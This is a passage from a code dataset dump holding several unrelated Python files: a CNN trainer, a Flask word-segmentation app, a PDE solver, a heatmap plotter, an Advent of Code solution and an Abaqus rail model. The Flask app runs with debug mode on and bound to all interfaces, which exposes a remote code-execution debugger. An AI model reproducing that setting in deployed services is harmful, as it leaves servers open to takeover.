/ len(labels)\n\ndef create_model(input_shape, num_classes, dropout_rate):\n model = models.Sequential([\n layers.Conv2D(filters=64, kernel_size=(3, 3), activation=\"relu\", input_shape=input_shape),\n layers.MaxPooling2D((2, 2)),\n layers.Flatten(),\n layers.Dense(64, activation=\"relu\"),\n layers.Dense(num_classes, activation=\"softmax\")\n ])\n model.compile(optimizer=\"adam\", loss=\"sparse_categorical_crossentropy\", metrics=[\"accuracy\"])\n return model\n\ndef create_worse_model(input_shape, num_classes, dropout_rate):\n model = models.Sequential([\n layers.Conv2D(filters=32, kernel_size=(5,5), activation=\"relu\", input_shape=input_shape),\n layers.MaxPooling2D((2, 2)),\n layers.Flatten(),\n layers.Dense(num_classes, activation=\"softmax\")\n ])\n model.compile(optimizer=\"adam\", loss=\"sparse_categorical_crossentropy\", metrics=[\"accuracy\"])\n return model\n\ndef build_model2(input_shape, num_classes):\n model = models.Sequential([\n layers.Conv2D(64, (3, 3), activation='relu', input_shape=input_shape, kernel_regularizer=l2(0.0001)),\n layers.MaxPooling2D((2, 2)),\n layers.Conv2D(128, (3, 3), activation='relu', padding='same'),\n layers.MaxPooling2D((2, 2)),\n layers.Conv2D(256, (3, 3), activation='relu', padding='same'),\n layers.MaxPooling2D((2, 2)),\n layers.Flatten(),\n layers.Dense(512, activation='relu'),\n layers.Dropout(0.5),\n layers.Dense(num_classes, activation='softmax')\n ])\n model.compile(optimizer=\"adam\", loss=\"sparse_categorical_crossentropy\", metrics=[\"accuracy\"])\n return model\n\ndef train_model(model, train_vectors, train_labels, validation_vectors, validation_labels, epochs, batch_size):\n history = model.fit(train_vectors, train_labels, epochs=epochs, batch_size=batch_size, validation_data=(validation_vectors, validation_labels))\n return history\n\ndef save_model(model, file_name):\n model.save(file_name)\n\ndef load_model(file_name):\n return tf.keras.models.load_model(file_name)\n\ndef predict_labels(model, test_vectors):\n return model.predict(test_vectors)\n\ndef plot_training(history_list, model_names):\n num_models = len(history_list)\n\n for i in range(num_models):\n history = history_list[i]\n model_name = model_names[i]\n\n plt.figure(figsize=(6, 4))\n plt.plot(np.arange(1, len(history.history['accuracy']) + 1), history.history['accuracy'], label='Training Accuracy')\n plt.plot(np.arange(1, len(history.history['val_accuracy']) + 1), history.history['val_accuracy'], label='Validation Accuracy')\n plt.title('{} Accuracy'.format(model_name))\n plt.xlabel('Epoch')\n plt.ylabel('Accuracy')\n plt.legend()\n plt.tight_layout()\n plt.show()\n\n\n\nif __name__ == \"__main__\":\n data = load_data_from_csv(DATA_FILE_NAME)\n\n train_split = 0.7\n val_split = 0.2\n test_split = 0.1\n\n split_index_train = int(len(data) * train_split)\n split_index_val = int(len(data) * (train_split + val_split))\n\n train_data = data[:split_index_train]\n val_data = data[split_index_train:split_index_val]\n test_data = data[split_index_val:]\n\n train_vectors, train_labels = preprocess_data(train_data)\n val_vectors, val_labels = preprocess_data(val_data)\n test_vectors, test_labels = preprocess_data(test_data)\n\n\n trained_models = []\n predictions_list = []\n history_list = []\n\n for i, model_file_name in enumerate(NAMES[:-2]):\n model_epochs = MODEL_EPOCHS[i]\n model_batch_size = BATCH_SIZE * (EPOCHS // model_epochs)\n\n model = create_model(input_shape=(28, 28, 1), num_classes=10, dropout_rate=0.2*(i+1))\n history = train_model(model, train_vectors, train_labels, val_vectors, val_labels, model_epochs, model_batch_size)\n save_model(model, model_file_name)\n trained_models.append(model)\n\n model = load_model(model_file_name)\n predictions = predict_labels(model, test_vectors)\n predictions_list.append(predictions)\n\n accuracy = get_accuracy(test_labels, predictions)\n print(\"Model {}: Accuracy: {:.2f}%\".format(i+1, accuracy * 100))\n\n history_list.append(history)\n\n for i, model_file_name in enumerate(NAMES[-2:]):\n model_epochs = MODEL_EPOCHS[i]\n model_batch_size = BATCH_SIZE * (EPOCHS // model_epochs)\n\n model = build_model2(input_shape=(28, 28, 1), num_classes=10)\n history = train_model(model, train_vectors, train_labels, val_vectors, val_labels, model_epochs, model_batch_size)\n save_model(model, model_file_name)\n trained_models.append(model)\n\n model = load_model(model_file_name)\n predictions = predict_labels(model, test_vectors)\n predictions_list.append(predictions)\n\n accuracy = get_accuracy(test_labels, predictions)\n print(\"Best Model {}: Accuracy: {:.2f}%\".format(i+1, accuracy * 100))\n\n history_list.append(history)\n \n for i, model_file_name in enumerate(NAMES[-2:]):\n model_epochs = MODEL_EPOCHS[i]\n model_batch_size = BATCH_SIZE * (EPOCHS // model_epochs)\n\n model = create_worse_model(input_shape=(28, 28, 1), num_classes=10, dropout_rate=0.2*(i+1))\n history = train_model(model, train_vectors, train_labels, val_vectors, val_labels, model_epochs, model_batch_size)\n save_model(model, model_file_name)\n trained_models.append(model)\n\n model = load_model(model_file_name)\n predictions = predict_labels(model, test_vectors)\n predictions_list.append(predictions)\n\n accuracy = get_accuracy(test_labels, predictions)\n print(\"Best Model {}: Accuracy: {:.2f}%\".format(i+1, accuracy * 100))\n\n history_list.append(history)\n\n model_names = [\"Model 1\", \"Model 2\", \"Best Model 1\", \"Best Model 2\", \"Worst Model 1\" , \"Worst Model 2\"]\n model_names = NAMES[:len(history_list)]\n plot_training(history_list, model_names)","repo_name":"Zuba13/ori-projekat","sub_path":"cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":6805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"71421748315","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: bryn\n\"\"\"\nfrom jieba import cut \nfrom flask import Flask, redirect, url_for, request,render_template\napp = Flask(__name__)\n\n@app.route('/success/')\ndef success(res):\n return render_template('result.html', result=res)\n\n@app.route('/text_seg',methods = ['POST', 'GET'])\ndef text_seg():\n if request.method == 'POST':\n text = request.form['text']\n text = ' | '.join(cut(text))\n return redirect(url_for('success',res = text))\n else:\n text = request.args.get('text')\n text = ' | '.join(cut(text))\n return redirect(url_for('success',res = text))\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug = True)\n","repo_name":"LinNan1/lab_final","sub_path":"code/myapp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"9358277230","text":"import DGM\nimport tensorflow as tf\nimport numpy as np\ntf.get_logger().setLevel('ERROR')\n\n# Model parameters\n\n# PDE domain\nt_low = 0 + 10e-15 # time lower bound\nT = 1 - 10e-15 # time upper bound\nx_low = 0.0 + 10e-15 # X lower bound\nx_high = 1 - 10e-15 # X upper bound\n\n\n# Parameters domains\nnu_low = 40.0\nnu_high = 50.0\ngamma_low = -2.0\ngamma_high = 2.0\ntheta_low = 1.0\ntheta_high = 1.0\n\n# NN parameters\nnum_layers = 3\nnodes_per_layer = 20\nlearning_rate = 0.0005\n\n# Training parameters\nsampling_stages = 100 # number of times to resample new time-space domain points\nsteps_per_sample = 100 # number of SGD steps to take before re-sampling\n\n# Sampling parameters\nnSim_interior = 2000\nnSim_terminal = 2000\n\n# Model tensor placeholders\n\n# inputs (time, space domain interior, space domain at initial time)\nt_interior_tnsr = tf.placeholder(tf.float64, [None,1])\nx_interior_tnsr = tf.placeholder(tf.float64, [None,1])\n\n#initial conditions\nt_initial_tnsr = tf.placeholder(tf.float64, [None,1])\nx_initial_tnsr = tf.placeholder(tf.float64, [None,1])\n\n#boundary conditions\nx_boundary_tnsr = tf.placeholder(tf.float64, [None,1])\nx_boundary_last_tnsr = tf.placeholder(tf.float64, [None,1])\n\n#parameters\nparam_gamma_tnsr = tf.placeholder(tf.float64, [None, 1])\nparam_theta_tnsr = tf.placeholder(tf.float64, [None, 1])\nparam_nu_tnsr = tf.placeholder(tf.float64, [None, 1])\n\n\ndef sampler(nSim_interior, nSim_terminal):\n ''' Sample time-space points from the function's domain; points are sampled\n uniformly on the interior of the domain, at the initial/terminal time points\n and along the spatial boundary at different time points. \n \n Args:\n nSim_interior: number of space points in the interior of the function's domain to sample \n nSim_terminal: number of space points at terminal time to sample (terminal condition)\n ''' \n \n # Sampler #1: PDE domain interior\n t_interior = np.random.uniform(low=t_low, high=T, size=[nSim_interior, 1])\n x_interior = np.random.uniform(low=x_low, high=x_high, size=[nSim_interior, 1])\n\n # Sampler #2: boundary\n x_boundary = np.ones(shape=(nSim_terminal, 1), dtype=np.float64)*(10e-50)\n x_boundary_last = np.ones(shape=(nSim_terminal, 1), dtype=np.float64)*(1-10e-50) \n\n # Sampler #3: initial condition\n t_terminal = np.zeros(shape = (nSim_terminal, 1))\n x_terminal = np.random.uniform(low=0, high=1, size = [nSim_terminal, 1])\n\n # Sampler #4: parameters interior\n gamma_interior = np.random.uniform(low=gamma_low, high=gamma_high, size=[nSim_interior, 1])\n theta_interior = np.random.uniform(low=theta_low, high=theta_high, size=[nSim_interior, 1])\n nu_interior = np.random.uniform(low=nu_low, high=nu_high, size=[nSim_interior, 1])\n\n\n return t_interior, x_interior, t_terminal, x_terminal, x_boundary, x_boundary_last, gamma_interior, theta_interior, nu_interior\n\ndef loss(model, t_interior, x_interior, \n t_terminal, x_terminal,\n x_boundary, x_boundary_last,\n param_gamma, param_theta, param_nu):\n\n # Loss term #1: PDE\n V = model(t_interior, [x_interior], [param_gamma, param_theta, param_nu])\n V_t = tf.gradients(V, t_interior)[0] #du/dt\n V_s = tf.gradients(V, x_interior)[0] #du/dx\n V_ss = tf.gradients(V_s, x_interior)[0] #d^2u/dx^2\n\n b = x_interior*(1-x_interior)/(2*param_nu)\n a = param_gamma * x_interior*(1-x_interior)\n diff_V = V_t - b * V_ss + a * V_s\n\n L1 = tf.reduce_mean(tf.square(diff_V)) \n \n # Loss term #2: boundary conditions\n boundary_target_payoff = param_nu*param_theta\n boundary_fitted_payoff = model(t_interior, [x_boundary], [param_gamma, param_theta, param_nu])\n boundary_fitted_right_payoff = model(t_interior, [x_boundary_last], [param_gamma, param_theta, param_nu])\n L2_left_boundary = tf.reduce_mean(tf.square(boundary_fitted_payoff - boundary_target_payoff))\n L2_right_boundary = tf.reduce_mean(tf.square(boundary_fitted_right_payoff)) \n L2 = L2_left_boundary + L2_right_boundary\n \n # Loss term #3: initial condition\n target_payoff = param_nu * param_theta*(1-tf.exp(-2*param_gamma*(1-x_terminal)))/(1-tf.exp(-2*param_gamma)) \n fitted_payoff = model(t_terminal, [x_terminal], [param_gamma, param_theta, param_nu])\n L3 = tf.reduce_mean( tf.square(fitted_payoff - target_payoff) )\n\n return L1, L2, L3\n\ndef build_model():\n #3 - number of parameters\n model = DGM.DGMNet(nodes_per_layer, num_layers, 1, 3)\n\n # loss \n L1_tnsr, L2_tnsr, L3_tnsr = loss(model, t_interior_tnsr, x_interior_tnsr, \n t_initial_tnsr, x_initial_tnsr, \n x_boundary_tnsr, x_boundary_last_tnsr,\n param_gamma_tnsr,\n param_theta_tnsr,\n param_nu_tnsr)\n loss_tnsr = L1_tnsr + L2_tnsr + L3_tnsr\n\n # option value function\n V = model(t_interior_tnsr, [x_interior_tnsr], [param_gamma_tnsr, param_theta_tnsr, param_nu_tnsr])\n\n # set optimizer\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss_tnsr)\n\n # initialize variables\n init_op = tf.global_variables_initializer()\n\n # open session\n sess = tf.Session()\n sess.run(init_op)\n\n return sess, loss_tnsr, optimizer\n\ndef train_model(sess, loss_tnsr, optimizer):\n # for each sampling stage\n for i in range(sampling_stages):\n \n # sample uniformly from the required regions\n t_interior, x_interior, t_initial, x_initial, x_boundary, x_boundary_last, param_gamma, param_theta, param_nu = sampler(nSim_interior, nSim_terminal)\n # for a given sample, take the required number of SGD steps\n for it in range(steps_per_sample):\n loss,_ = sess.run([loss_tnsr, optimizer],\n feed_dict = {t_interior_tnsr:t_interior, x_interior_tnsr:x_interior,\n t_initial_tnsr:t_initial, x_initial_tnsr:x_initial, \n x_boundary_tnsr:x_boundary, \n x_boundary_last_tnsr:x_boundary_last,\n param_gamma_tnsr: param_gamma, param_theta_tnsr: param_theta, param_nu_tnsr: param_nu})\n t_interior = None\n x_interior = None\n t_initial = None\n x_initial = None\n x_boundary = None\n x_boundary_last = None\n\n print(f\"#{i}/{sampling_stages}: loss: {loss}\")\n\n\nif __name__ == \"__main__\":\n output_file_name = 'one_pop_example'\n sess, loss_tnsr, optimizer = build_model()\n train_model(sess, loss_tnsr, optimizer)\n saver = tf.train.Saver()\n saver.save(sess, f'./trained_models/{output_file_name}')\n print(f'The model is saved in trained_models/{output_file_name}')","repo_name":"Kharlamov-Vladislav/Dadi-deep-galerkin","sub_path":"model_train.py","file_name":"model_train.py","file_ext":"py","file_size_in_byte":6861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"32859306210","text":"import json\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport matplotlib.colors as mcolors\r\nfrom PIL import Image\r\n\r\n# BUGS:\r\n# Two plots might not have comparible colors if they have different max values. Maybe set a false maximum and plot it on the graph?\r\n# Whole plot shifts posiotion on the map if it does not contain the correct western-most (and maybe also northern/southern-most) coordinate. Find what this coordinate is and always alter the input data to have a value at this position\r\n\r\n\r\nf = open('\\\\\\\\insrvr2\\\\folders$\\\\Kieran\\\\Desktop\\\\Py\\\\Geocoding\\\\final_postcodes.json', 'r')\r\nI = Image.open('\\\\\\\\insrvr2\\\\folders$\\\\Kieran\\\\Desktop\\\\Py\\\\Geocoding\\\\australia4.png')\r\nerr = open('C:\\\\Users\\\\Kieran\\\\Downloads\\\\err.txt', 'a')\r\nsrc = f.read()\r\ncodes = json.loads(src)\r\n\r\ndef transparent_cmap(cmap, N=255):\r\n \"Copy colormap and set alpha values\"\r\n\r\n mycmap = cmap\r\n mycmap._init()\r\n mycmap._lut[:,-1] = np.linspace(0, -0.5, N+4)\r\n return mycmap\r\n\r\nmycmap = transparent_cmap(plt.cm.hot)\r\n\r\ndef getCoordinate(postcode):\r\n\ttry:\r\n\t\tval = codes[str(postcode)]\r\n\t\t# x,y = -val[3]/6.4, val[4]/7.55\r\n\t\tx,y = -val[3]/6.4, val[4]/7.4\r\n\t\treturn x,y\r\n\texcept:\r\n\t\t# print('Invalid: ' + postcode)\r\n\t\terr.write(str(postcode) + '\\n')\r\n\t\treturn [0,0]\r\n\r\ndef plot(postcodes, artificialMaximum =1):\r\n\tpointSize = 2\r\n\tcoordinates = []\r\n\tfor postcode in postcodes:\r\n\t\tx, y = getCoordinate(postcode)\r\n\t\tif x == 0: \r\n\t\t\tcontinue\r\n\t\tcoordinates.append([round(x*100),round(y*100)])\r\n\tprint(coordinates[1])\r\n\t# coordinates.append([round(1000/6.4),round(10550/7.55)])\r\n\tcoordinates.append([round(1000/6.4),round(10550/7.4)])\r\n\tcoordinates = np.array(coordinates)\r\n\tmaxX = np.max(coordinates[:,0])\r\n\tmaxY = np.max(coordinates[:,1])\r\n\t# minX = np.min(coordinates[:,0])+23\r\n\t# minY = np.min(coordinates[:,1])+83\r\n\tminX = np.min(coordinates[:,0])+13\r\n\tminY = np.min(coordinates[:,1])+92\r\n\tprint(maxX)\r\n\tprint(maxY)\r\n\tdisplay = np.zeros((maxX-minX+pointSize,maxY-minY+pointSize))\r\n\tfor coordinate in coordinates:\r\n\t\tfor i in range(0,pointSize-1):\r\n\t\t\tfor j in range(0,pointSize-1):\r\n\t\t\t\tdisplay[coordinate[0]-minX+i,coordinate[1]-minY+j] = display[coordinate[0]-minX+i,coordinate[1]-minY+j] + 1\r\n\tdisplay[0,0] = artificialMaximum\r\n\tfig, ax = plt.subplots(1, 1)\r\n\t\r\n\tax.imshow(I)\r\n\t\r\n\tplt.imshow(display, cmap=transparent_cmap(plt.cm.hot), interpolation='none',norm=mcolors.LogNorm())\r\n\tplt.colorbar()\r\n\t\r\n\r\ndef plot2(postcodes, values):\r\n\tvalues2 = list(set(values))\r\n\tvalues2.insert(0, '')\r\n\tpointSize = 3\r\n\tcoordinates = []\r\n\tfor i in range(0, len(postcodes)-1):\r\n\t\tx, y = getCoordinate(postcodes[i])\r\n\t\tif x == 0: \r\n\t\t\tcontinue\r\n\t\tcoordinates.append([round(x*100),round(y*100), values2.index(values[i])])\r\n\tcoordinates = np.array(coordinates)\r\n\tmaxX = np.max(coordinates[:,0])\r\n\tmaxY = np.max(coordinates[:,1])\r\n\tminX = np.min(coordinates[:,0])+23\r\n\tminY = np.min(coordinates[:,1])+83\r\n\tdisplay = np.zeros((maxX-minX+pointSize,maxY-minY+pointSize))\r\n\tfor coordinate in coordinates:\r\n\t\tfor i in range(0,pointSize-1):\r\n\t\t\tfor j in range(0,pointSize-1):\r\n\t\t\t\tdisplay[coordinate[0]-minX+i,coordinate[1]-minY+j] = coordinate[2]\r\n\tfig, ax = plt.subplots(1, 1)\r\n\tax.imshow(I)\r\n\tplt.imshow(display, cmap=transparent_cmap(plt.cm.gist_rainbow), interpolation='cubic')\r\n\tcbar = plt.colorbar()\r\n\tcbar.set_ticks(list())\r\n\tfor index, label in enumerate(values2):\r\n\t\tx = 10\r\n\t\ty = (2 * index) / (2)\r\n\t\tcbar.ax.text(x, y, label)\r\n\t\r\ndef show():\r\n\tplt.show()\r\n","repo_name":"JamFactoryInc/ML","sub_path":"Py/pyodbc/heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"29673555275","text":"import sys\nfrom typing import Tuple\n\n\nclass Forest:\n def __init__(self):\n self._forest = []\n self._width = 0\n\n def addRow(self, row: str):\n # could try to use 0xblah and then << as we scroll through\n if self._width == 0:\n self._width = len(row.strip()) - 1\n\n self._forest.append(\n [False if spot == '.' else True for spot in row.strip()])\n\n @property\n def num_rows(self) -> int:\n return len(self._forest)\n\n def hit_a_tree(self, row: int, column: int) -> bool:\n i = column % (self._width + 1)\n return self._forest[row][i]\n\n def __str__(self):\n res = f\"width: {self._width} num rows: {self.num_rows}\\n\"\n for row in self._forest:\n res += str(\"\".join([\"#\" if s else \".\" for s in row])) + \"\\n\"\n return res\n\n\ndef read_input(filename: str) -> Forest:\n with open(filename) as f:\n forest = Forest()\n for l in f:\n forest.addRow(l)\n return forest\n\n\ndef solve(forest: Forest, filename: str, slope: Tuple[int] = (3, 1)) -> int:\n col = slope[0]\n hit_count = 0\n for row in range(slope[1], forest.num_rows, slope[1]):\n if forest.hit_a_tree(row, col):\n hit_count += 1\n col += slope[0]\n return hit_count\n\n\ndef main(filename: str):\n forest = read_input(filename)\n # print(forest)\n slopes = [(1, 1), (3, 1), (5, 1), (7, 1), (1, 2)]\n res = 1\n for slope in slopes:\n num = solve(forest, filename, slope=slope)\n print(f\"{slope} hit {num}\")\n res *= num\n print(res)\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1])\n","repo_name":"aaronbush/aoc-2020","sub_path":"d3/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"73382733276","text":"\"\"\"Create a basic 3d rail based on an abaqus sketch saved as a .sat file\n\n.. codeauthor:: Knut Andreas Meyer\n\"\"\"\n# Python imports\nfrom __future__ import print_function\nimport os, sys, inspect\nimport numpy as np\n\n# Abaqus imports\nfrom abaqusConstants import *\nfrom abaqus import mdb\nimport part, regionToolset\n\n# Project imports\nfrom rollover.local_paths import data_path\nfrom rollover.utils import naming_mod as names\nfrom rollover.utils import get_utils as get\nfrom rollover.utils import abaqus_python_tools as apt\nfrom rollover.utils import setup_material_mod as setup_material\nfrom rollover.three_d.utils import sketch_tools\n\ndefault_material = {'material_model': 'elastic', 'mpar': {'E': 210.e3, 'nu': 0.3}}\n\ndef create_from_param(rail_param):\n \"\"\" Call :py:func:`rollover.three_d.rail.basic.create` with arguments that are present in \n the rail_param dictionary. \n \n :param rail_param: dictionary containing input arguments to create function, required:\n \n - 'rail_profile'\n - 'rail_length'\n \n :type rail_param: dict\n \n :returns: The model database returned from create\n :rtype: Model object (Abaqus)\n \"\"\"\n \n create_param = {p: rail_param[p] for p in rail_param if p in create.__code__.co_varnames}\n \n return create(**create_param)\n \n\ndef create(rail_profile, rail_length, refine_region=None, sym_dir=None, material=default_material):\n \"\"\"Create a new model containing a simple rail geometry.\n \n The model is named 'RAIL' and the profile is created by importing the sketch rail_profile and \n extruding it by rail_length. Two sets, one in each end of the rail are created.\n \n :param rail_profile: Path to an Abaqus sketch profile saved as .sat file (acis)\n :type rail_profile: str\n \n :param rail_length: Length of rail to be extruded\n :type rail_length: float\n \n :param refine_region: Rectangle specifying partition with mesh refinement in contact region, \n defaults to None implying no refined region\n :type refine_region: list(list(float)), optional\n \n :param sym_dir: Vector specifying the normal direction if symmetry is used in the rail profile\n :type sym_dir: list(float) (len=3)\n \n :param material: Dictionary specifying the rail material model, containing the fields \n 'material_model' and 'mpar'. See :py:mod:`setup_material_mod` for detailed \n requirements\n :type material: dict\n \n :returns: The model database containing the rail part\n :rtype: Model (Abaqus object)\n\n \"\"\"\n if rail_profile.startswith(':/'):\n rail_profile = data_path + rail_profile[1:]\n \n rail_model = apt.create_model(names.rail_model)\n profile_sketch = sketch_tools.import_sketch(rail_model, rail_profile, name='rail_profile')\n rail_part = rail_model.Part(name=names.rail_part, dimensionality=THREE_D, type=DEFORMABLE_BODY)\n rail_part.BaseSolidExtrude(sketch=profile_sketch, depth=rail_length)\n if refine_region is not None:\n create_partition(rail_model, rail_part, refine_region)\n \n create_sets(rail_part, rail_length, refine_region, sym_dir)\n \n add_material_and_section(rail_model, rail_part, material)\n \n return rail_model\n\n\ndef create_sets(rail_part, rail_length, refine_region=None, sym_dir=None):\n \"\"\"Create (1) a set on each side of the rail with names from names.rail_side_sets, (2) the \n contact surface and set on the top of the rail with name names.rail_contact_surf and (3) a set \n on the bottom of the rail. If sym_dir is given, create a set with all faces in the yz-plane.\n \n :param rail_part: The part in which the sets will be created\n :type rail_part: Part (Abaqus object)\n \n :param rail_length: Length of the extruded rail\n :type rail_length: float\n \n :param refine_region: Rectangle specifying partition with mesh refinement in contact region, \n defaults to None implying no refined region\n :type refine_region: list(list(float)), optional\n \n :param sym_dir: Vector specifying the normal direction if symmetry is used in the rail profile\n :type sym_dir: list(float) (len=3)\n \n :returns: None\n :rtype: None\n\n \"\"\"\n for z, set_name in zip([0, rail_length], names.rail_side_sets):\n faces = get_end_faces(rail_part, zpos=z)\n rail_part.Set(name=set_name, faces=faces)\n \n if refine_region is None:\n contact_cell = rail_part.cells[0]\n else:\n partition_face, point_on_partition_face = get_partition_face(rail_part, refine_region)\n contact_cell = rail_part.cells.findAt(point_on_partition_face)\n \n create_contact_face_set(rail_part, contact_cell, exclude_dir=sym_dir)\n \n bottom_faces = get_bottom_faces(rail_part)\n rail_part.Set(name=names.rail_bottom_nodes, faces=part.FaceArray(faces=bottom_faces))\n \n if sym_dir is not None:\n rail_part.Set(name=names.rail_sym_set, \n faces=rail_part.faces.getByBoundingBox(xMin=-1.e-6, xMax=1.e-6))\n \n\ndef get_bottom_faces(rail_part):\n \"\"\"Return a list of faces that are on the bottom of the rail profile. These are identified by \n having their pointOn with an y-coordinate equal to the minimum of all faces and a normal \n direction [0, -1, 0]\n \n :param rail_part: The part in which the sets will be created\n :type rail_part: Part object (Abaqus)\n \n :returns: A list of faces that are located in the bottom of the rail\n :rtype: list[ Face object (Abaqus) ]\n\n \"\"\"\n TOL_YMIN = 1.e-6\n TOL_YDIR = 1.e-3\n \n ymin = np.inf\n for face in rail_part.faces:\n ymin = min(ymin, face.pointOn[0][1])\n \n bottom_faces = []\n for face in rail_part.faces:\n if face.pointOn[0][1] < ymin + TOL_YMIN:\n if face.getNormal()[1] < -1.0 + TOL_YDIR:\n bottom_faces.append(face)\n \n return bottom_faces\n \n \ndef create_contact_face_set(rail_part, contact_cell, exclude_dir=None):\n \"\"\" Create a face set and a surface for the contact region. \n \n :param rail_part: The rail part\n :type rail_part: Part object (Abaqus)\n \n :param contact_cell: The cell in the rail part that has the contact\n faces.\n :type contact_cell: Cell object (Abaqus)\n \n :param exclude_dir: Normalized vector. If not none, and a face \n normal aligns with this direction, the face is \n excluded. \n :type exclude_dir: list, np.array\n \n :returns: None\n \n \"\"\"\n \n # Get all faces on the contact cell\n contact_cell_faces = [rail_part.faces[f_ind] \n for f_ind in contact_cell.getFaces()]\n \n # Get all faces in the neighbouring cells\n neighbouring_cells = contact_cell.getAdjacentCells()\n if len(neighbouring_cells) > 0: \n neighbouring_faces = []\n for nc in neighbouring_cells:\n for f_ind in nc.getFaces():\n neighbouring_faces.append(rail_part.faces[f_ind])\n \n # Get all faces in contact_cell that are external \n # (i.e. not shared by neighbouring cells)\n external_faces = []\n for cf in contact_cell_faces:\n if cf not in neighbouring_faces:\n external_faces.append(cf)\n else:\n external_faces = contact_cell_faces\n \n # Get external faces without normal in z-direction or exclude_dir\n contact_faces = []\n exclude_vec = np.array([0,0,0] if exclude_dir is None else exclude_dir)\n for ef in external_faces:\n n_vec = ef.getNormal()\n if np.abs(n_vec[2]) < 0.99 and np.dot(np.array(n_vec), exclude_vec) < 0.99:\n contact_faces.append(ef)\n \n rail_part.Surface(name=names.rail_contact_surf, side1Faces=part.FaceArray(contact_faces))\n rail_part.Set(name=names.rail_contact_surf, faces=part.FaceArray(contact_faces))\n \n \ndef get_end_faces(rail_part, zpos):\n \"\"\"Get the all faces at the end of the rail specified by zpos\n \n :param rail_part: The part in which the sets will be created\n :type rail_part: Part (Abaqus object)\n \n :param zpos: The position of the end_faces\n :type zpos: float\n \n :returns: A FaceArray object containing all faces at zpos with z-normal direction\n :rtype: FaceArray (Abaqus object)\n\n \"\"\"\n faces = rail_part.faces.getByBoundingBox(xMin=-np.inf, xMax=np.inf, \n yMin=-np.inf, yMax=np.inf, \n zMax=zpos + 1.e-5, \n zMin=zpos - 1.e-5)\n return faces\n \n \ndef create_partition(rail_model, rail_part, refine_region):\n \"\"\"Create a partition by extruding the rectangle specified by \n refine_region\n \n :param rail_model: The model to which the sketch will be added\n :type rail_model: Model (Abaqus object)\n \n :param rail_part: The part in which the sets will be created\n :type rail_part: Part (Abaqus object)\n \n :param refine_region: Rectangle specifying partition with mesh \n refinement in contact region\n :type refine_region: list(list(float))\n \n :returns: None\n :rtype: None\n\n \"\"\"\n rail_cell = rail_part.cells[0] # Should only be 1 before partitioning\n rail_face = get_end_faces(rail_part, zpos=0.0)[0] # Should only be 1 before partitioning\n \n extrude_axis = rail_part.DatumAxisByPrincipalAxis(principalAxis=ZAXIS)\n extrude_axis = rail_part.datums[extrude_axis.id]\n vertical_axis = rail_part.DatumAxisByPrincipalAxis(principalAxis=YAXIS)\n vertical_axis = rail_part.datums[vertical_axis.id]\n \n sketch_position = rail_part.MakeSketchTransform(sketchPlane=rail_face, origin=(0.0, 0.0, 0.0), \n sketchUpEdge=vertical_axis, \n sketchPlaneSide=SIDE1)\n \n partition_sketch = rail_model.ConstrainedSketch(name='partition_sketch', sheetSize=200.0,\n transform=sketch_position)\n partition_sketch.rectangle(point1=refine_region[0], point2=refine_region[1])\n \n rail_part.PartitionFaceBySketch(faces=rail_face, sketch=partition_sketch,\n sketchUpEdge=vertical_axis, sketchOrientation=RIGHT)\n \n partition_face, point_on_partition_face = get_partition_face(rail_part, refine_region)\n partition_edge_ids = partition_face.getEdges()\n partition_edges = [rail_part.edges[i] for i in partition_edge_ids]\n \n \n # rail_part.Set(name='partition_edges', edges=part.EdgeArray(edges=partition_edges))\n rail_part.PartitionCellByExtrudeEdge(line=extrude_axis, cells=rail_cell, edges=partition_edges, \n sense=FORWARD)\n \n \ndef get_partition_face(rail_part, refine_region):\n \"\"\" Given the two points specifying the refine region rectangle,\n find the face that is within this region by checking each corner of \n the rectangle.\n \n :param rail_part: The rail part\n :type rail_part: Part object (Abaqus)\n \n :param refine_region: List of two points: [[x1,y1],[x2,y2]] \n specifying the rectangle used to partition the\n rail's end face (at z=0)\n :type refine_region: list[ list ]\n \n :returns: The face and the point used to find it\n :rtype: tuple(Face object (Abaqus), np.array)\n \n \"\"\"\n rel_length = 0.001\n def get_face(pa, pb):\n point = p1 + rel_length*(p2-p1)\n return rail_part.faces.findAt(tuple(point)), point\n \n p1, p2 = [np.array([refine_region[i][0], refine_region[i][1], 0.0]) for i in [0, 1]]\n \n face, point = get_face(p1, p2)\n if face is not None:\n return face, point\n \n face, point = get_face(p2, p1)\n if face is not None:\n return face, point\n \n p1, p2 = [np.array([refine_region[i][0], refine_region[1-i][1], 0.0]) for i in [0, 1]]\n \n face, point = get_face(p1, p2)\n if face is not None:\n return face, point\n \n face, point = get_face(p2, p1)\n if face is not None:\n return face, point\n \n raise ValueError('Could not find the partition face')\n\n\ndef add_material_and_section(rail_model, rail_part, material):\n \"\"\" Create the material specified and create one section for the \n entire rail.\n \n :param rail_model: The rail model\n :type rail_model: Model object (Abaqus)\n \n :param rail_part: The rail part\n :type rail_part: Part object (Abaqus)\n \n :param material: The material specification dictionary, see \n material_spec in \n :py:func:`~rollover.utils.setup_material_mod.add_material`\n :type material: dict\n \n \"\"\"\n setup_material.add_material(rail_model, material_spec=material, name='RAIL_MATERIAL')\n rail_model.HomogeneousSolidSection(name=names.rail_sect, material='RAIL_MATERIAL')\n region = regionToolset.Region(cells=rail_part.cells)\n rail_part.SectionAssignment(region=region, sectionName=names.rail_sect)\n\n","repo_name":"KnutAM/AbaqusRolloverSimulation","sub_path":"rollover/three_d/rail/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":13406,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"50"} +{"seq_id":"12922032271","text":"# -*- coding:utf-8 -*-\r\nimport 